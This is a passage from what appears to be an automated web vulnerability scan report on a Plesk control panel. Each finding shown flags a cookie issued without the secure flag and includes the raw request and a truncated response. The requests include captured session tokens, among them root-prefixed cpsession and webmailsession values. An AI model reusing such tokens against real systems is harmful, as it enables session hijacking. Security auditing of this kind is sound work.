Pragma: no-cache
Set-Cookie: psaContext=health; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:02 GMT
Server: sw-cp-server
Content-Length: 7263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller-self/subscription-overview/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller-self/subscription-overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:38 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=deleted; expires=Fri, 24-Sep-2010 14:13:37 GMT; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:38 GMT
Server: sw-cp-server
Content-Length: 22558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list?context=resellers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:49 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=resellers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:49 GMT
Server: sw-cp-server
Content-Length: 14689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:42:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:42:20 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=resellers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:42:21 GMT
Server: sw-cp-server
Content-Length: 14643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=credentials-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:17:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:17:12 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=personal-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:17:12 GMT
Server: sw-cp-server
Content-Length: 28204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 15:27:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server
Content-Length: 9049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/3/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/3/?context=reseller-tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:15:44 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:15:44 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=reseller-tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:15:44 GMT
Server: sw-cp-server
Content-Length: 9058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/settings

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/settings?context=settings HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:27 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=settings; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:28 GMT
Server: sw-cp-server
Content-Length: 13093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/tools?context=tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:34 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=tools; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:35 GMT
Server: sw-cp-server
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list?context=subscriptions HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:11:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:11:09 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:11:09 GMT
Server: sw-cp-server
Content-Length: 19549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:16:00 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=subscriptions; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server
Content-Length: 19812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

